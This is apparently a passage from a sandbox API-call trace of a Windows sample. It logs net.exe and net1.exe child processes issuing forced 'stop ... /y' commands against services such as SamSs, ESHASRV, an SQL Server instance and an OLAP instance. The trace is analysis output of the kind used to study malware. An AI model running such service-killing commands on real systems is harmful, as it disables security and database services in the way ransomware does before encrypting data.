(_String1="computer", _String2="SamSs") returned -16 [0119.652] _wcsicmp (_String1="config", _String2="SamSs") returned -16 [0119.652] _wcsicmp (_String1="continue", _String2="SamSs") returned -16 [0119.652] _wcsicmp (_String1="cont", _String2="SamSs") returned -16 [0119.652] _wcsicmp (_String1="file", _String2="SamSs") returned -13 [0119.652] _wcsicmp (_String1="files", _String2="SamSs") returned -13 [0119.652] _wcsicmp (_String1="group", _String2="SamSs") returned -12 [0119.652] _wcsicmp (_String1="groups", _String2="SamSs") returned -12 [0119.652] _wcsicmp (_String1="help", _String2="SamSs") returned -11 [0119.652] _wcsicmp (_String1="helpmsg", _String2="SamSs") returned -11 [0119.653] _wcsicmp (_String1="localgroup", _String2="SamSs") returned -7 [0119.653] _wcsicmp (_String1="pause", _String2="SamSs") returned -3 [0119.653] _wcsicmp (_String1="session", _String2="SamSs") returned 4 [0119.653] _wcsicmp (_String1="sessions", _String2="SamSs") returned 4 [0119.653] _wcsicmp (_String1="sess", _String2="SamSs") returned 4 [0119.653] _wcsicmp (_String1="share", _String2="SamSs") returned 7 [0119.653] _wcsicmp (_String1="start", _String2="SamSs") returned 19 [0119.653] _wcsicmp (_String1="stats", _String2="SamSs") returned 19 [0119.653] _wcsicmp (_String1="statistics", _String2="SamSs") returned 19 [0119.653] _wcsicmp (_String1="stop", _String2="SamSs") returned 19 [0119.653] _wcsicmp (_String1="time", _String2="SamSs") returned 1 [0119.653] _wcsicmp (_String1="user", _String2="SamSs") returned 2 [0119.653] _wcsicmp (_String1="users", _String2="SamSs") returned 2 [0119.653] _wcsicmp (_String1="msg", _String2="SamSs") returned -6 [0119.653] _wcsicmp (_String1="messenger", _String2="SamSs") returned -6 [0119.653] _wcsicmp (_String1="receiver", _String2="SamSs") returned -1 [0119.653] _wcsicmp (_String1="rcv", _String2="SamSs") returned -1 [0119.653] _wcsicmp (_String1="netpopup", _String2="SamSs") returned -5 [0119.653] _wcsicmp (_String1="redirector", _String2="SamSs") returned -1 [0119.653] _wcsicmp (_String1="redir", _String2="SamSs") returned -1 [0119.653] _wcsicmp (_String1="rdr", _String2="SamSs") returned -1 [0119.653] _wcsicmp (_String1="workstation", _String2="SamSs") returned 4 [0119.653] _wcsicmp (_String1="work", _String2="SamSs") returned 4 [0119.653] _wcsicmp (_String1="wksta", _String2="SamSs") returned 4 [0119.653] _wcsicmp (_String1="prdr", _String2="SamSs") returned -3 [0119.653] _wcsicmp (_String1="devrdr", _String2="SamSs") returned -15 [0119.653] _wcsicmp (_String1="lanmanworkstation", _String2="SamSs") returned -7 [0119.653] _wcsicmp (_String1="server", _String2="SamSs") returned 4 [0119.653] _wcsicmp (_String1="svr", _String2="SamSs") returned 21 [0119.653] _wcsicmp (_String1="srv", _String2="SamSs") returned 17 [0119.653] _wcsicmp (_String1="lanmanserver", _String2="SamSs") returned -7 [0119.653] _wcsicmp (_String1="alerter", _String2="SamSs") returned -18 [0119.653] _wcsicmp (_String1="netlogon", _String2="SamSs") returned -5 [0119.654] _wcsupr (in: _String="SamSs" | out: _String="SAMSS") returned="SAMSS" [0119.654] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x625488 [0119.890] GetServiceKeyNameW (in: hSCManager=0x625488, lpDisplayName="SAMSS", lpServiceName=0x39aaf0, lpcchBuffer=0x16f968 | out: lpServiceName="", lpcchBuffer=0x16f968) returned 0 [0119.891] _wcsicmp (_String1="msg", _String2="SAMSS") returned -6 [0119.891] _wcsicmp (_String1="messenger", _String2="SAMSS") returned -6 [0119.891] _wcsicmp (_String1="receiver", _String2="SAMSS") returned -1 [0119.891] _wcsicmp (_String1="rcv", _String2="SAMSS") returned -1 [0119.891] _wcsicmp (_String1="redirector", _String2="SAMSS") returned -1 [0119.891] _wcsicmp (_String1="redir", _String2="SAMSS") returned -1 [0119.891] _wcsicmp (_String1="rdr", _String2="SAMSS") returned -1 [0119.891] _wcsicmp (_String1="workstation", _String2="SAMSS") returned 4 [0119.891] _wcsicmp (_String1="work", _String2="SAMSS") returned 4 [0119.891] _wcsicmp (_String1="wksta", _String2="SAMSS") returned 4 [0119.891] _wcsicmp (_String1="prdr", _String2="SAMSS") returned -3 [0119.891] _wcsicmp (_String1="devrdr", _String2="SAMSS") returned -15 [0119.891] _wcsicmp (_String1="lanmanworkstation", _String2="SAMSS") returned -7 [0119.891] _wcsicmp (_String1="server", _String2="SAMSS") returned 4 [0119.891] _wcsicmp (_String1="svr", _String2="SAMSS") returned 21 [0119.891] _wcsicmp (_String1="srv", _String2="SAMSS") returned 17 [0119.891] _wcsicmp (_String1="lanmanserver", _String2="SAMSS") returned -7 [0119.891] _wcsicmp (_String1="alerter", _String2="SAMSS") returned -18 [0119.891] _wcsicmp (_String1="netlogon", _String2="SAMSS") returned -5 [0119.891] NetServiceControl (in: servername=0x0, service="SAMSS", opcode=0x0, arg=0x0, bufptr=0x16f964 | out: bufptr=0x16f964) returned 0x0 [0119.897] NetApiBufferAllocate (in: ByteCount=0xfa0, Buffer=0x16f940 | out: Buffer=0x16f940*=0x627728) returned 0x0 [0119.897] OpenServiceW (hSCManager=0x625488, lpServiceName="SAMSS", dwDesiredAccess=0xc) returned 0x6255a0 [0119.898] QueryServiceStatus (in: hService=0x6255a0, lpServiceStatus=0x16f914 | out: lpServiceStatus=0x16f914*(dwServiceType=0x20, dwCurrentState=0x4, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0119.898] NetApiBufferFree (Buffer=0x627728) returned 0x0 [0119.899] CloseServiceHandle (hSCObject=0x6255a0) returned 1 [0119.899] wcscpy_s (in: _Destination=0x39a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0119.899] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74860000 [0119.900] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74860000, dwMessageId=0x88f, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="The requested pause, continue, or stop is not valid for this service.\r\n") returned 0x47 [0119.902] GetFileType (hFile=0x0) returned 0x0 [0119.902] LocalAlloc (uFlags=0x0, uBytes=0x8e) returned 0x626130 [0119.902] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The requested pause, continue, or stop is not valid for this service.\r\n", cchWideChar=71, lpMultiByteStr=0x626130, cbMultiByte=142, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The requested pause, continue, or stop is not valid for this service.\r\n", lpUsedDefaultChar=0x0) returned 71 [0119.902] WriteFile (in: hFile=0x0, lpBuffer=0x626130, nNumberOfBytesToWrite=0x47, lpNumberOfBytesWritten=0x16f85c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f85c, lpOverlapped=0x0) returned 0 [0119.902] LocalFree (hMem=0x626130) returned 0x0 [0119.902] GetFileType (hFile=0x0) returned 0x0 [0119.902] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x626130 [0119.902] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x626130, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nb", lpUsedDefaultChar=0x0) returned 2 [0119.902] WriteFile (in: hFile=0x0, lpBuffer=0x626130, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x16f85c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f85c, lpOverlapped=0x0) returned 0 [0119.902] LocalFree (hMem=0x626130) returned 0x0 [0119.902] _ultow (in: _Dest=0x88f, _Radix=1505420 | out: _Dest=0x88f) returned="2191" [0119.902] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74860000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2191.\r\n") returned 0x34 [0119.902] GetFileType (hFile=0x0) returned 0x0 [0119.903] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x626130 [0119.903] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2191.\r\n", cchWideChar=52, lpMultiByteStr=0x626130, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2191.\r\nfor this service.\r\n", lpUsedDefaultChar=0x0) returned 52 [0119.903] WriteFile (in: hFile=0x0, lpBuffer=0x626130, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x16f868, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f868, lpOverlapped=0x0) returned 0 [0119.903] LocalFree (hMem=0x626130) returned 0x0 [0119.903] GetFileType (hFile=0x0) returned 0x0 [0119.903] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x626130 [0119.903] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x626130, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nb", lpUsedDefaultChar=0x0) returned 2 [0119.903] WriteFile (in: hFile=0x0, lpBuffer=0x626130, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x16f868, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f868, lpOverlapped=0x0) returned 0 [0119.903] LocalFree (hMem=0x626130) returned 0x0 [0119.903] NetApiBufferFree (Buffer=0x621ad0) returned 0x0 [0119.903] NetApiBufferFree (Buffer=0x621ae8) returned 0x0 [0119.904] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SamSs /y" [0119.904] exit (_Code=2) Process: id = "217" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x6885d000" os_pid = "0x758" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "79" os_parent_pid = "0xea8" cmd_line = "C:\\Windows\\system32\\net1 stop ESHASRV /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 611 os_tid = 0x884 [0119.688] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fea4 | out: lpSystemTimeAsFileTime=0x24fea4*(dwLowDateTime=0x1b143ab0, dwHighDateTime=0x1d6f0d1)) [0119.688] GetCurrentProcessId () returned 0x758 [0119.688] GetCurrentThreadId () returned 0x884 [0119.688] GetTickCount () returned 0x1151333 [0119.689] QueryPerformanceCounter (in: lpPerformanceCount=0x24fe9c | out: lpPerformanceCount=0x24fe9c*=23878939766) returned 1 [0119.689] GetModuleHandleA (lpModuleName=0x0) returned 0x380000 [0119.689] __set_app_type (_Type=0x1) [0119.689] __p__fmode () returned 0x770331f4 [0119.689] __p__commode () returned 0x770331fc [0119.689] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x38ffe6) returned 0x0 [0119.689] __getmainargs (in: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068, _DoWildCard=0, _StartInfo=0x399024 | out: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068) returned 0 [0119.689] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0119.689] GetConsoleOutputCP () returned 0x1b5 [0119.905] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x399080 | out: lpCPInfo=0x399080) returned 1 [0119.905] SetThreadUILanguage (LangId=0x0) returned 0x409 [0119.909] sprintf_s (in: _DstBuf=0x24fe5c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0119.910] setlocale (category=0, locale=".437") returned="English_United States.437" [0119.912] GetStdHandle (nStdHandle=0xfffffff5) returned 0x448 [0119.912] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0119.912] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ESHASRV /y" [0119.912] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x24fc28, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0119.912] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x62) returned 0x703ad0 [0119.913] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0119.913] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x24fe2c | out: Buffer=0x24fe2c*=0x701ad8) returned 0x0 [0119.913] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x24fe2c | out: Buffer=0x24fe2c*=0x701af0) returned 0x0 [0119.913] _fileno (_File=0x77032900) returned -2 [0119.913] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0119.913] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0119.913] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0119.913] _wcsicmp (_String1="config", _String2="stop") returned -16 [0119.913] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0119.913] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0119.913] _wcsicmp (_String1="file", _String2="stop") returned -13 [0119.913] _wcsicmp (_String1="files", _String2="stop") returned -13 [0119.913] _wcsicmp (_String1="group", _String2="stop") returned -12 [0119.913] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0119.913] _wcsicmp (_String1="help", _String2="stop") returned -11 [0119.913] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0119.914] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0119.914] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0119.914] _wcsicmp (_String1="session", _String2="stop") returned -15 [0119.914] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0119.914] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0119.914] _wcsicmp (_String1="share", _String2="stop") returned -12 [0119.914] _wcsicmp (_String1="start", _String2="stop") returned -14 [0119.914] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0119.914] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0119.914] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0119.923] _wcsicmp (_String1="accounts", _String2="ESHASRV") returned -4 [0119.923] _wcsicmp (_String1="computer", _String2="ESHASRV") returned -2 [0119.923] _wcsicmp (_String1="config", _String2="ESHASRV") returned -2 [0119.923] _wcsicmp (_String1="continue", _String2="ESHASRV") returned -2 [0119.923] _wcsicmp (_String1="cont", _String2="ESHASRV") returned -2 [0119.923] _wcsicmp (_String1="file", _String2="ESHASRV") returned 1 [0119.924] _wcsicmp (_String1="files", _String2="ESHASRV") returned 1 [0119.924] _wcsicmp (_String1="group", _String2="ESHASRV") returned 2 [0119.924] _wcsicmp (_String1="groups", _String2="ESHASRV") returned 2 [0119.924] _wcsicmp (_String1="help", _String2="ESHASRV") returned 3 [0119.924] _wcsicmp (_String1="helpmsg", _String2="ESHASRV") returned 3 [0119.924] _wcsicmp (_String1="localgroup", _String2="ESHASRV") returned 7 [0119.924] _wcsicmp (_String1="pause", _String2="ESHASRV") returned 11 [0119.924] _wcsicmp (_String1="session", _String2="ESHASRV") returned 14 [0119.924] _wcsicmp (_String1="sessions", _String2="ESHASRV") returned 14 [0119.924] _wcsicmp (_String1="sess", _String2="ESHASRV") returned 14 [0119.924] _wcsicmp (_String1="share", _String2="ESHASRV") returned 14 [0119.924] _wcsicmp (_String1="start", _String2="ESHASRV") returned 14 [0119.924] _wcsicmp (_String1="stats", _String2="ESHASRV") returned 14 [0119.924] _wcsicmp (_String1="statistics", _String2="ESHASRV") returned 14 [0119.924] _wcsicmp (_String1="stop", _String2="ESHASRV") returned 14 [0119.924] _wcsicmp (_String1="time", _String2="ESHASRV") returned 15 [0119.924] _wcsicmp (_String1="user", _String2="ESHASRV") returned 16 [0119.924] _wcsicmp (_String1="users", _String2="ESHASRV") returned 16 [0119.924] _wcsicmp (_String1="msg", _String2="ESHASRV") returned 8 [0119.924] _wcsicmp (_String1="messenger", _String2="ESHASRV") returned 8 [0119.924] _wcsicmp (_String1="receiver", _String2="ESHASRV") returned 13 [0119.924] _wcsicmp (_String1="rcv", _String2="ESHASRV") returned 13 [0119.924] _wcsicmp (_String1="netpopup", _String2="ESHASRV") returned 9 [0119.924] _wcsicmp (_String1="redirector", _String2="ESHASRV") returned 13 [0119.924] _wcsicmp (_String1="redir", _String2="ESHASRV") returned 13 [0119.924] _wcsicmp (_String1="rdr", _String2="ESHASRV") returned 13 [0119.924] _wcsicmp (_String1="workstation", _String2="ESHASRV") returned 18 [0119.925] _wcsicmp (_String1="work", _String2="ESHASRV") returned 18 [0119.925] _wcsicmp (_String1="wksta", _String2="ESHASRV") returned 18 [0119.925] _wcsicmp (_String1="prdr", _String2="ESHASRV") returned 11 [0119.925] _wcsicmp (_String1="devrdr", _String2="ESHASRV") returned -1 [0119.925] _wcsicmp (_String1="lanmanworkstation", _String2="ESHASRV") returned 7 [0119.925] _wcsicmp (_String1="server", _String2="ESHASRV") returned 14 [0119.925] _wcsicmp (_String1="svr", _String2="ESHASRV") returned 14 [0119.925] _wcsicmp (_String1="srv", _String2="ESHASRV") returned 14 [0119.925] _wcsicmp (_String1="lanmanserver", _String2="ESHASRV") returned 7 [0119.925] _wcsicmp (_String1="alerter", _String2="ESHASRV") returned -4 [0119.925] _wcsicmp (_String1="netlogon", _String2="ESHASRV") returned 9 [0119.925] _wcsupr (in: _String="ESHASRV" | out: _String="ESHASRV") returned="ESHASRV" [0119.925] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x705498 [0119.960] GetServiceKeyNameW (in: hSCManager=0x705498, lpDisplayName="ESHASRV", lpServiceName=0x39aaf0, lpcchBuffer=0x24fdc8 | out: lpServiceName="", lpcchBuffer=0x24fdc8) returned 0 [0119.961] _wcsicmp (_String1="msg", _String2="ESHASRV") returned 8 [0119.961] _wcsicmp (_String1="messenger", _String2="ESHASRV") returned 8 [0119.961] _wcsicmp (_String1="receiver", _String2="ESHASRV") returned 13 [0119.961] _wcsicmp (_String1="rcv", _String2="ESHASRV") returned 13 [0119.961] _wcsicmp (_String1="redirector", _String2="ESHASRV") returned 13 [0119.961] _wcsicmp (_String1="redir", _String2="ESHASRV") returned 13 [0119.961] _wcsicmp (_String1="rdr", _String2="ESHASRV") returned 13 [0119.961] _wcsicmp (_String1="workstation", _String2="ESHASRV") returned 18 [0119.962] _wcsicmp (_String1="work", _String2="ESHASRV") returned 18 [0119.962] _wcsicmp (_String1="wksta", _String2="ESHASRV") returned 18 [0119.962] _wcsicmp (_String1="prdr", _String2="ESHASRV") returned 11 [0119.962] _wcsicmp (_String1="devrdr", _String2="ESHASRV") returned -1 [0119.962] _wcsicmp (_String1="lanmanworkstation", _String2="ESHASRV") returned 7 [0119.962] _wcsicmp (_String1="server", _String2="ESHASRV") returned 14 [0119.962] _wcsicmp (_String1="svr", _String2="ESHASRV") returned 14 [0119.962] _wcsicmp (_String1="srv", _String2="ESHASRV") returned 14 [0119.962] _wcsicmp (_String1="lanmanserver", _String2="ESHASRV") returned 7 [0119.962] _wcsicmp (_String1="alerter", _String2="ESHASRV") returned -4 [0119.962] _wcsicmp (_String1="netlogon", _String2="ESHASRV") returned 9 [0119.962] NetServiceControl (in: servername=0x0, service="ESHASRV", opcode=0x0, arg=0x0, bufptr=0x24fdc4 | out: bufptr=0x24fdc4) returned 0x889 [0119.963] wcscpy_s (in: _Destination=0x39a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0119.963] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74860000 [0119.964] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74860000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0119.965] GetFileType (hFile=0x0) returned 0x0 [0119.965] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x703eb8 [0119.965] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x703eb8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0119.965] WriteFile (in: hFile=0x0, lpBuffer=0x703eb8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x24fd04, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x24fd04, lpOverlapped=0x0) returned 0 [0119.966] LocalFree (hMem=0x703eb8) returned 0x0 [0119.966] GetFileType (hFile=0x0) returned 0x0 [0119.966] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x706160 [0119.966] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x706160, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\np", lpUsedDefaultChar=0x0) returned 2 [0119.966] WriteFile (in: hFile=0x0, lpBuffer=0x706160, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x24fd04, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x24fd04, lpOverlapped=0x0) returned 0 [0119.966] LocalFree (hMem=0x706160) returned 0x0 [0119.966] _ultow (in: _Dest=0x889, _Radix=2424116 | out: _Dest=0x889) returned="2185" [0119.966] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74860000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0119.966] GetFileType (hFile=0x0) returned 0x0 [0119.966] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x706160 [0119.966] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x706160, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0119.966] WriteFile (in: hFile=0x0, lpBuffer=0x706160, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x24fd10, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x24fd10, lpOverlapped=0x0) returned 0 [0119.966] LocalFree (hMem=0x706160) returned 0x0 [0119.966] GetFileType (hFile=0x0) returned 0x0 [0119.966] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x706160 [0119.966] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x706160, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\np", lpUsedDefaultChar=0x0) returned 2 [0119.966] WriteFile (in: hFile=0x0, lpBuffer=0x706160, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x24fd10, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x24fd10, lpOverlapped=0x0) returned 0 [0119.966] LocalFree (hMem=0x706160) returned 0x0 [0119.967] NetApiBufferFree (Buffer=0x701ad8) returned 0x0 [0119.967] NetApiBufferFree (Buffer=0x701af0) returned 0x0 [0119.967] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ESHASRV /y" [0119.967] exit (_Code=2) Process: id = "218" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x68485000" os_pid = "0xc78" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MSOLAP$SYSTEM_BGC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 612 os_tid = 0xbcc Process: id = "219" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5e10000" os_pid = "0x9b4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "83" os_parent_pid = "0xeec" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$TPS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 614 os_tid = 0x964 [0120.613] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f93c | out: lpSystemTimeAsFileTime=0x26f93c*(dwLowDateTime=0x1ba0abd0, dwHighDateTime=0x1d6f0d1)) [0120.613] GetCurrentProcessId () returned 0x9b4 [0120.613] GetCurrentThreadId () returned 0x964 [0120.613] GetTickCount () returned 0x11516cc [0120.613] QueryPerformanceCounter (in: lpPerformanceCount=0x26f934 | out: lpPerformanceCount=0x26f934*=23971429748) returned 1 [0120.614] GetModuleHandleA (lpModuleName=0x0) returned 0x380000 [0120.614] __set_app_type (_Type=0x1) [0120.614] __p__fmode () returned 0x770331f4 [0120.614] __p__commode () returned 0x770331fc [0120.614] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x38ffe6) returned 0x0 [0120.614] __getmainargs (in: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068, _DoWildCard=0, _StartInfo=0x399024 | out: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068) returned 0 [0120.615] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0120.615] GetConsoleOutputCP () returned 0x1b5 [0120.967] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x399080 | out: lpCPInfo=0x399080) returned 1 [0120.967] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.970] sprintf_s (in: _DstBuf=0x26f8f4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0120.970] setlocale (category=0, locale=".437") returned="English_United States.437" [0120.972] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3f8 [0120.972] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0120.972] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$TPS /y" [0120.972] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x26f6c0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0120.972] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x66) returned 0x5c3ad8 [0120.972] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0120.972] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x26f8c4 | out: Buffer=0x26f8c4*=0x5c1ae0) returned 0x0 [0120.972] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x26f8c4 | out: Buffer=0x26f8c4*=0x5c1af8) returned 0x0 [0120.972] _fileno (_File=0x77032900) returned -2 [0120.973] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0120.973] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0120.973] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0120.973] _wcsicmp (_String1="config", _String2="stop") returned -16 [0120.973] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0120.973] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0120.973] _wcsicmp (_String1="file", _String2="stop") returned -13 [0120.973] _wcsicmp (_String1="files", _String2="stop") returned -13 [0120.973] _wcsicmp (_String1="group", _String2="stop") returned -12 [0120.973] _wcsicmp (_String1="groups", 